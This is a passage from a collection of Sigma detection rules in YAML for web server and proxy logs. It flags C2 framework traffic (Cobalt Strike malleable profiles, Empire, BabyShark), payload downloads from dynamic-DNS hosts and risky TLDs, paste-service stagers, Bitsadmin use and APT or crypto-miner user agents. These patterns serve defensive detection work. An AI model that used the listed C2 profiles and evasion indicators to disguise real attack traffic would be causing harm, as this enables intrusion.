- '__pthread_tpp_change_priority: Assertion `new_prio == -1 || (new_prio >= fifo_min_prio && new_prio <= fifo_max_prio)'
condition: keywords
falsepositives:
- 3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185
level: medium
================================================
FILE: rules/web/product/nginx/web_nginx_core_dump.yml
================================================
title: Nginx Core Dump
id: 59ec40bb-322e-40ab-808d-84fa690d7e56
status: test
description: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
references:
- https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps
- https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
author: Florian Roth (Nextron Systems)
date: 2021-05-31
modified: 2023-05-08
tags:
- attack.impact
- attack.t1499.004
logsource:
service: nginx
detection:
keywords:
- 'exited on signal 6 (core dumped)'
condition: keywords
falsepositives:
- Serious issues with a configuration or plugin
level: high
================================================
FILE: rules/web/proxy_generic/proxy_download_susp_dyndns.yml
================================================
title: Download from Suspicious Dyndns Hosts
id: 195c1119-ef07-4909-bb12-e66f5e07bf3c
status: test
description: Detects download of certain file types from hosts with dynamic DNS names (selected list)
references:
- https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats
author: Florian Roth (Nextron Systems)
date: 2017-11-08
modified: 2023-05-18
tags:
- attack.defense-evasion
- attack.command-and-control
- attack.t1105
- attack.t1568
logsource:
category: proxy
detection:
selection:
c-uri-extension:
- 'exe'
- 'vbs'
- 'bat'
- 'rar'
- 'ps1'
- 'doc'
- 'docm'
- 'xls'
- 'xlsm'
- 'pptm'
- 'rtf'
- 'hta'
- 'dll'
- 'ws'
- 'wsf'
- 'sct'
- 'zip'
# If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/
cs-host|endswith:
- '.hopto.org'
- '.no-ip.org'
- '.no-ip.info'
- '.no-ip.biz'
- '.no-ip.com'
- '.noip.com'
- '.ddns.name'
- '.myftp.org'
- '.myftp.biz'
- '.serveblog.net'
- '.servebeer.com'
- '.servemp3.com'
- '.serveftp.com'
- '.servequake.com'
- '.servehalflife.com'
- '.servehttp.com'
- '.servegame.com'
- '.servepics.com'
- '.myvnc.com'
- '.ignorelist.com'
- '.jkub.com'
- '.dlinkddns.com'
- '.jumpingcrab.com'
- '.ddns.info'
- '.mooo.com'
- '.dns-dns.com'
- '.strangled.net'
- '.adultdns.net'
- '.craftx.biz'
- '.ddns01.com'
- '.dns53.biz'
- '.dnsapi.info'
- '.dnsd.info'
- '.dnsdynamic.com'
- '.dnsdynamic.net'
- '.dnsget.org'
- '.fe100.net'
- '.flashserv.net'
- '.ftp21.net'
- '.http01.com'
- '.http80.info'
- '.https443.com'
- '.imap01.com'
- '.kadm5.com'
- '.mysq1.net'
- '.ns360.info'
- '.ntdll.net'
- '.ole32.com'
- '.proxy8080.com'
- '.sql01.com'
- '.ssh01.com'
- '.ssh22.net'
- '.tempors.com'
- '.tftpd.net'
- '.ttl60.com'
- '.ttl60.org'
- '.user32.com'
- '.voip01.com'
- '.wow64.net'
- '.x64.me'
- '.xns01.com'
- '.dyndns.org'
- '.dyndns.info'
- '.dyndns.tv'
- '.dyndns-at-home.com'
- '.dnsomatic.com'
- '.zapto.org'
- '.webhop.net'
- '.25u.com'
- '.slyip.net'
condition: selection
falsepositives:
- Software downloads
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml
================================================
title: Download From Suspicious TLD - Blacklist
id: 00d0b5ab-1f55-4120-8e83-487c0a7baf19
related:
- id: b5de2919-b74a-4805-91a7-5049accbaefe
type: similar
status: test
description: Detects download of certain file types from hosts in suspicious TLDs
references:
- https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap
- https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf
- https://www.spamhaus.org/statistics/tlds/
- https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/
author: Florian Roth (Nextron Systems)
date: 2017-11-07
modified: 2023-05-18
tags:
- attack.initial-access
- attack.t1566
- attack.execution
- attack.t1203
- attack.t1204.002
logsource:
category: proxy
detection:
selection:
c-uri-extension:
- 'exe'
- 'vbs'
- 'bat'
- 'rar'
- 'ps1'
- 'doc'
- 'docm'
- 'xls'
- 'xlsm'
- 'pptm'
- 'rtf'
- 'hta'
- 'dll'
- 'ws'
- 'wsf'
- 'sct'
- 'zip'
# If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/
cs-host|endswith:
# Symantec / Chris Larsen analysis
- '.country'
- '.stream'
- '.gdn'
- '.mom'
- '.xin'
- '.kim'
- '.men'
- '.loan'
- '.download'
- '.racing'
- '.online'
- '.science'
- '.ren'
- '.gb'
- '.win'
- '.top'
- '.review'
- '.vip'
- '.party'
- '.tech'
- '.xyz'
- '.date'
- '.faith'
- '.zip'
- '.cricket'
- '.space'
# McAfee report
- '.info'
- '.vn'
- '.cm'
- '.am'
- '.cc'
- '.asia'
- '.ws'
- '.tk'
- '.biz'
- '.su'
- '.st'
- '.ro'
- '.ge'
- '.ms'
- '.pk'
- '.nu'
- '.me'
- '.ph'
- '.to'
- '.tt'
- '.name'
- '.tv'
- '.kz'
- '.tc'
- '.mobi'
# Spamhaus
- '.study'
- '.click'
- '.link'
- '.trade'
- '.accountant'
# Spamhaus 2018 https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/
- '.cf'
- '.gq'
- '.ml'
- '.ga'
# Custom
- '.pw'
condition: selection
falsepositives:
- All kinds of software downloads
level: low
================================================
FILE: rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml
================================================
title: Download From Suspicious TLD - Whitelist
id: b5de2919-b74a-4805-91a7-5049accbaefe
related:
- id: 00d0b5ab-1f55-4120-8e83-487c0a7baf19
type: similar
status: test
description: Detects executable downloads from suspicious remote systems
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2017-03-13
modified: 2023-05-18
tags:
- attack.initial-access
- attack.t1566
- attack.execution
- attack.t1203
- attack.t1204.002
logsource:
category: proxy
detection:
selection:
c-uri-extension:
- 'exe'
- 'vbs'
- 'bat'
- 'rar'
- 'ps1'
- 'doc'
- 'docm'
- 'xls'
- 'xlsm'
- 'pptm'
- 'rtf'
- 'hta'
- 'dll'
- 'ws'
- 'wsf'
- 'sct'
- 'zip'
# If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/
filter:
cs-host|endswith:
- '.com'
- '.org'
- '.net'
- '.edu'
- '.gov'
- '.uk'
- '.ca'
- '.de'
- '.jp'
- '.fr'
- '.au'
- '.us'
- '.ch'
- '.it'
- '.nl'
- '.se'
- '.no'
- '.es'
# Extend this list as needed
condition: selection and not filter
falsepositives:
- All kind of software downloads
level: low
================================================
FILE: rules/web/proxy_generic/proxy_downloadcradle_webdav.yml
================================================
title: Windows WebDAV User Agent
id: e09aed7a-09e0-4c9a-90dd-f0d52507347e
status: test
description: Detects WebDav DownloadCradle
references:
- https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
author: Florian Roth (Nextron Systems)
date: 2018-04-06
modified: 2021-11-27
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/'
cs-method: 'GET'
condition: selection
falsepositives:
- Administrative scripts that download files from the Internet
- Administrative scripts that retrieve certain website contents
- Legitimate WebDAV administration
level: high
================================================
FILE: rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml
================================================
title: F5 BIG-IP iControl Rest API Command Execution - Proxy
id: b59c98c6-95e8-4d65-93ee-f594dfb96b17
related:
- id: 85254a62-22be-4239-b79c-2ec17e566c37
type: similar
status: test
description: Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
references:
- https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash
- https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029
- https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516
author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
date: 2023-11-08
tags:
- attack.initial-access
- attack.t1190
logsource:
category: proxy
detection:
selection:
cs-method: 'POST'
c-uri|endswith: '/mgmt/tm/util/bash'
condition: selection
falsepositives:
- Legitimate usage of the BIG IP REST API to execute command for administration purposes
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_hello_world_user_agent.yml
================================================
title: Potential Hello-World Scraper Botnet Activity
id: 1712bafe-be05-4a0e-89d4-17a3ed151bf5
status: experimental
description: |
Detects network traffic potentially associated with a scraper botnet variant that uses the "Hello-World/1.0" user-agent string.
references:
- https://www.greynoise.io/blog/new-scraper-botnet-concentrated-in-taiwan
- https://viz.greynoise.io/tags/hello-world-scraper-botnet?days=30
author: Joseph A. M.
date: 2025-08-02
tags:
- attack.reconnaissance
- attack.t1595
logsource:
category: proxy
detection:
selection:
c-useragent: 'Hello-World/1.0'
cs-method: 'GET'
condition: selection
falsepositives:
- Legitimate network monitoring or vulnerability scanning tools that may use this generic user agent.
- Internal development or testing scripts. Consider filtering by source IP if this is expected from certain systems.
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml
================================================
title: HackTool - BabyShark Agent Default URL Pattern
id: 304810ed-8853-437f-9e36-c4975c3dfd7e
status: test
description: Detects Baby Shark C2 Framework default communication patterns
references:
- https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
author: Florian Roth (Nextron Systems)
date: 2021-06-09
modified: 2024-02-15
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-uri|contains: 'momyshark\?key='
condition: selection
falsepositives:
- Unlikely
level: critical
================================================
FILE: rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml
================================================
title: HackTool - CobaltStrike Malleable Profile Patterns - Proxy
id: f3f21ce1-cdef-4bfc-8328-ed2e826f5fac
related:
- id: 953b895e-5cc9-454b-b183-7f3db555452e
type: obsolete
- id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8
type: obsolete
- id: 37325383-740a-403d-b1a2-b2b4ab7992e7
type: obsolete
- id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc
type: obsolete
status: test
description: Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).
references:
- https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile
- https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100
- https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile
- https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/
- https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile
author: Markus Neis, Florian Roth (Nextron Systems)
date: 2024-02-15
tags:
- attack.defense-evasion
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection_amazon_1:
c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
cs-method: 'GET'
c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books'
cs-host: 'www.amazon.com'
cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996'
selection_amazon_2:
c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
cs-method: 'POST'
c-uri: '/N4215/adj/amzn.us.sr.aps'
cs-host: 'www.amazon.com'
selection_generic_1:
c-useragent:
- 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)'
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )'
- 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'
selection_generic_2:
c-useragent|endswith: '; MANM; MANM)'
selection_oscp:
c-uri|contains: '/oscp/'
cs-host: 'ocsp.verisign.com'
selection_onedrive:
cs-method: 'GET'
c-uri|endswith: '\?manifest=wac'
cs-host: 'onedrive.live.com'
filter_main_onedrive:
c-uri|startswith: 'http'
c-uri|contains: '://onedrive.live.com/'
condition: 1 of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml
================================================
title: HackTool - Empire UserAgent URI Combo
id: b923f7d6-ac89-4a50-a71a-89fb846b4aa8
status: test
description: Detects user agent and URI paths used by empire agents
references:
- https://github.com/BC-SECURITY/Empire
author: Florian Roth (Nextron Systems)
date: 2020-07-13
modified: 2024-02-26
tags:
- attack.defense-evasion
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
cs-uri:
- '/admin/get.php'
- '/news.php'
- '/login/process.php'
cs-method: 'POST'
condition: selection
falsepositives:
- Valid requests with this exact user agent to server scripts of the defined names
level: high
================================================
FILE: rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml
================================================
title: PUA - Advanced IP/Port Scanner Update Check
id: 1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d
status: test
description: Detect the update check performed by Advanced IP/Port Scanner utilities.
references:
- https://www.advanced-ip-scanner.com/
- https://www.advanced-port-scanner.com/
author: Axel Olsson
date: 2022-08-14
modified: 2024-02-15
tags:
- attack.discovery
- attack.reconnaissance
- attack.t1590
logsource:
category: proxy
detection:
selection:
# Example request: http://www.advanced-port-scanner.com/checkupdate.php?lng=en&ver=2-5-3680&beta=n&type=upd&rmode=p&product=aps
# Example request2: http://www.advanced-ip-scanner.com/checkupdate.php?lng=en&ver=2-5-3499&beta=n&type=upd&rmode=p&product=aips
c-uri|contains: '/checkupdate.php'
c-uri-query|contains|all:
- 'lng='
- 'ver='
- 'beta='
- 'type='
- 'rmode='
- 'product='
condition: selection
falsepositives:
- Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environement.
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_pwndrop.yml
================================================
title: PwnDrp Access
id: 2b1ee7e4-89b6-4739-b7bb-b811b6607e5e
status: test
description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
references:
- https://breakdev.org/pwndrop/
author: Florian Roth (Nextron Systems)
date: 2020-04-15
modified: 2021-11-27
tags:
- attack.command-and-control
- attack.t1071.001
- attack.t1102.001
- attack.t1102.003
logsource:
category: proxy
detection:
selection:
c-uri|contains: '/pwndrop/'
condition: selection
falsepositives:
- Unknown
level: critical
================================================
FILE: rules/web/proxy_generic/proxy_raw_paste_service_access.yml
================================================
title: Raw Paste Service Access
id: 5468045b-4fcc-4d1a-973c-c9c9578edacb
status: test
description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
references:
- https://www.virustotal.com/gui/domain/paste.ee/relations
author: Florian Roth (Nextron Systems)
date: 2019-12-05
modified: 2023-01-19
tags:
- attack.command-and-control
- attack.t1071.001
- attack.t1102.001
- attack.t1102.003
- attack.defense-evasion
logsource:
category: proxy
detection:
selection:
c-uri|contains:
- '.paste.ee/r/'
- '.pastebin.com/raw/'
- '.hastebin.com/raw/'
- '.ghostbin.co/paste/*/raw/'
- 'pastetext.net/'
- 'pastebin.pl/'
- 'paste.ee/'
condition: selection
falsepositives:
- User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)
level: high
================================================
FILE: rules/web/proxy_generic/proxy_susp_flash_download_loc.yml
================================================
title: Flash Player Update from Suspicious Location
id: 4922a5dd-6743-4fc2-8e81-144374280997
status: test
description: Detects a flashplayer update from an unofficial location
references:
- https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb
author: Florian Roth (Nextron Systems)
date: 2017-10-25
modified: 2022-08-08
tags:
- attack.initial-access
- attack.t1189
- attack.execution
- attack.t1204.002
- attack.defense-evasion
- attack.t1036.005
logsource:
category: proxy
detection:
selection:
- c-uri|contains: '/flash_install.php'
- c-uri|endswith: '/install_flash_player.exe'
filter:
cs-host|endswith: '.adobe.com'
condition: selection and not filter
falsepositives:
- Unknown flash download locations
level: high
================================================
FILE: rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml
================================================
title: Suspicious Network Communication With IPFS
id: eb6c2004-1cef-427f-8885-9042974e5eb6
status: test
description: Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.
references:
- https://blog.talosintelligence.com/ipfs-abuse/
- https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11
- https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638
author: Gavin Knapp
date: 2023-03-16
tags:
- attack.collection
- attack.credential-access
- attack.t1056
logsource:
category: proxy
detection:
selection:
cs-uri|re: '(?i)(ipfs\.io/|ipfs\.io\s).+\..+@.+\.[a-z]+'
condition: selection
falsepositives:
- Legitimate use of IPFS being used in the organisation. However the cs-uri regex looking for a user email will likely negate this.
level: low
================================================
FILE: rules/web/proxy_generic/proxy_telegram_api.yml
================================================
title: Telegram API Access
id: b494b165-6634-483d-8c47-2026a6c52372
status: test
description: Detects suspicious requests to Telegram API without the usual Telegram User-Agent
references:
- https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/
- https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/
- https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
author: Florian Roth (Nextron Systems)
date: 2018-06-05
modified: 2023-05-18
tags:
- attack.defense-evasion
- attack.command-and-control
- attack.t1071.001
- attack.t1102.002
logsource:
category: proxy
detection:
selection:
cs-host: 'api.telegram.org' # Often used by Bots
filter:
c-useragent|contains:
# Used https://core.telegram.org/bots/samples for this list
- 'Telegram'
- 'Bot'
condition: selection and not filter
falsepositives:
- Legitimate use of Telegram bots in the company
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_ua_apt.yml
================================================
title: APT User Agent
id: 6ec820f2-e963-4801-9127-d8b2dce4d31b
status: test
description: Detects suspicious user agent strings used in APT malware in proxy logs
references:
- Internal Research
author: Florian Roth (Nextron Systems), Markus Neis
date: 2019-11-12
modified: 2024-02-15
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent:
# APT Related
- 'SJZJ (compatible; MSIE 6.0; Win32)' # APT Backspace
- 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0' # APT GrizzlySteppe - ChopStick - US CERT https://www.cisa.gov/news-events/alerts/2017/02/10/enhanced-analysis-grizzly-steppe
- 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC' # Comment Crew Miniasp
- 'Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)' # Comment Crew Miniasp
- 'webclient' # Naikon APT
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200' # Naikon APT
- 'Mozilla/4.0 (compatible; MSI 6.0;' # SnowGlobe Babar - yes, it is cut
- 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # Sofacy - Xtunnel
- 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/' # Sofacy - Xtunnel
- 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2' # Sofacy - Xtunnel
- 'Mozilla/4.0' # Derusbi backdoor ELF https://github.com/fideliscyber/indicators/tree/master/FTA-1021
- 'Netscape' # Unit78020 Malware
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7' # Unit78020 Malware
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1' # Winnti related
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)' # Winnti related
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)' # APT17
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)' # Bronze Butler - Daserf
- 'Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)' # Bronze Butler - Daserf
- 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)' # TSCookie https://app.any.run/tasks/0996b314-5133-491b-8d23-d431ffdec597
- 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
- 'Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)' # VPNFilter https://blog.talosintelligence.com/2018/05/VPNFilter.html
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
- 'Mozilla v5.1 *' # Sofacy Zebrocy samples
- 'MSIE 8.0' # Sofacy Azzy Backdoor from https://www.hybrid-analysis.com/sample/a80e29c0757bee05338fd5c22a542d852ad86c477068e3eb4aacc1c3e59e2eef?environmentId=100
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html
- 'Mozilla/4.0 (compatible; RMS)' # Attacks on industrial enterprises using RMS and TeamViewer - https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/
- 'Mozilla/4.0 (compatible; MSIE 6.0; DynGate)' # Attacks on industrial enterprises using RMS and TeamViewer - https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/
- 'O/9.27 (W; U; Z)' # Cmstar https://www.virustotal.com/#/file/e4328011bb2b04abc856ccd04404c9f95d67167f6c291d343e8ffa8aa2aa2099/details
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0*' # KerrDown UA
- 'Mozilla/5.0 (Windows NT 9; *' # Suspicious 'Windows NT 9' user agent - used by APT33 malware in 2018
- 'hots scot' # Unknown iOS zero-day implant https://twitter.com/craiu/status/1176437994288484352?s=20
- 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT)' # https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36' # Hidden Cobra malware
- 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)' # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;' # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/
- 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0' # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/
- 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36' # SideWalk malware used by Sparkling Goblin
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0' # LitePower stager used by WRITE https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39' # https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)' # https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
- 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # PlugX backdoor https://unit42.paloaltonetworks.com/thor-plugx-variant/
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246001' # RedCurl Downloader APT https://www.facct.ru/blog/redcurl-2024
condition: selection
falsepositives:
- Old browsers
level: high
================================================
FILE: rules/web/proxy_generic/proxy_ua_base64_encoded.yml
================================================
title: Suspicious Base64 Encoded User-Agent
id: d443095b-a221-4957-a2c4-cd1756c9b747
related:
- id: 894a8613-cf12-48b3-8e57-9085f54aa0c3
type: derived
status: test
description: Detects suspicious encoded User-Agent strings, as seen used by some malware.
references:
- https://deviceatlas.com/blog/list-of-user-agent-strings#desktop
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-04
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent|startswith:
- 'Q2hyb21l' # Chrome Encoded with offset to not include padding
- 'QXBwbGVXZWJLaX' # AppleWebKit Encoded with offset to not include padding
- 'RGFsdmlr' # Dalvik Encoded with offset to not include padding
- 'TW96aWxsY' # Mozilla Encoded with offset to not include padding (as used by YamaBot)
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml
================================================
title: Bitsadmin to Uncommon IP Server Address
id: 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3
status: test
description: Detects Bitsadmin connections to IP addresses instead of FQDN names
references:
- https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027
author: Florian Roth (Nextron Systems)
date: 2022-06-10
modified: 2022-08-24
tags:
- attack.command-and-control
- attack.t1071.001
- attack.defense-evasion
- attack.persistence
- attack.t1197
- attack.s0190
logsource:
category: proxy
detection:
selection:
c-useragent|startswith: 'Microsoft BITS/'
cs-host|endswith:
- '1'
- '2'
- '3'
- '4'
- '5'
- '6'
- '7'
- '8'
- '9'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml
================================================
title: Bitsadmin to Uncommon TLD
id: 9eb68894-7476-4cd6-8752-23b51f5883a7
status: test
description: Detects Bitsadmin connections to domains with uncommon TLDs
references:
- https://twitter.com/jhencinski/status/1102695118455349248
- https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2019-03-07
modified: 2023-05-17
tags:
- attack.command-and-control
- attack.t1071.001
- attack.defense-evasion
- attack.persistence
- attack.t1197
- attack.s0190
logsource:
category: proxy
detection:
selection:
c-useragent|startswith: 'Microsoft BITS/'
falsepositives:
cs-host|endswith:
- '.com'
- '.net'
- '.org'
- '.scdn.co' # spotify streaming
- '.sfx.ms' # Microsoft domain, example request: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-08-15-21-xx-xx/PreSignInSettingsConfig.json
condition: selection and not falsepositives
falsepositives:
- Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca
level: high
================================================
FILE: rules/web/proxy_generic/proxy_ua_cryptominer.yml
================================================
title: Crypto Miner User Agent
id: fa935401-513b-467b-81f4-f9e77aa0dd78
status: test
description: Detects suspicious user agent strings used by crypto miners in proxy logs
references:
- https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65
- https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h
author: Florian Roth (Nextron Systems)
date: 2019-10-21
modified: 2021-11-27
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent|startswith:
# XMRig
- 'XMRig '
# CCMiner
- 'ccminer'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/proxy_generic/proxy_ua_empty.yml
================================================
title: HTTP Request With Empty User Agent
id: 21e44d78-95e7-421b-a464-ffd8395659c4
status: test
description: |
Detects a potentially suspicious empty user agent strings in proxy log.
